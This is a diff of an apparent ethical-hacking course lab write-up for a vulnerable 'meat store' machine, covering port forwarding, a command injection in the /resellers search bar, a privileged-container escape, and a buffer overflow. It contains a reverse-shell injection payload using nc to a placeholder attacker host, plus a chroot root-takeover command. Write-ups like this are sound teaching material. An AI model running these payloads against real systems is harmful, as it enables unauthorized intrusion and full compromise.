Owanesh/ETH2324/docs/REPORT.md

 ```sh
 ssh -L 9090:localhost:3100 saltbae@192.168.1.151 -i id_rsa
 ```
 To do this though we need the private ssh key which we already have (if we traversed the easy path) or we could just simply create another pair.
-After that we contact localhost:9090 and we are greeted with a meat store!
-VC0RP must be into some shady things…
+After that we contact `localhost:9090` and we are greeted with a meat store! vC0rp must be into some shady things…

 We start to play with the website until we find the `/resellers` page.
 This page presents a search bar used to find meat resellers in the world.
 This search bar presents yet another command injection vulnerability.
 With the following payload we spawn a reverse shell:
 ```sh
 “; nc <attacker_machine>:<port> -e /bin/sh %23
 ```
-Once we enter things seem a little odd… We realize that we are not in the system, but in a container.
-A privileged container!
-So we can mount the server filesystem on the docker container and act as the root of the server:
+Once we enter things seem a little odd… We realize that we are not in the system, but in a container, a privileged container!
+We can mount the server's filesystem on the docker container and act as the root of the server:
 ```sh
 chroot /host sh
 ```

 ## 🔴 Hard path
 The same `shadow-butchers-client` executable in the *saltbae* home is vulnerable to a buffer overflow.
 The buffer overflow is exploitable from the *order meat from suppliers* option.
 The program will ask the user to input the name of the supplier he wants to buy the meat from.
-This string is copied to a buffer wihtout checking the length.
+This string is copied to a buffer without checking the length.
 Since the machine does not have ASLR active and the executable was compiled with executable stack and with no canaries the exploitation is pretty straight forward.

 We tested the following python exploit written using the *pwntools* library:
 ```py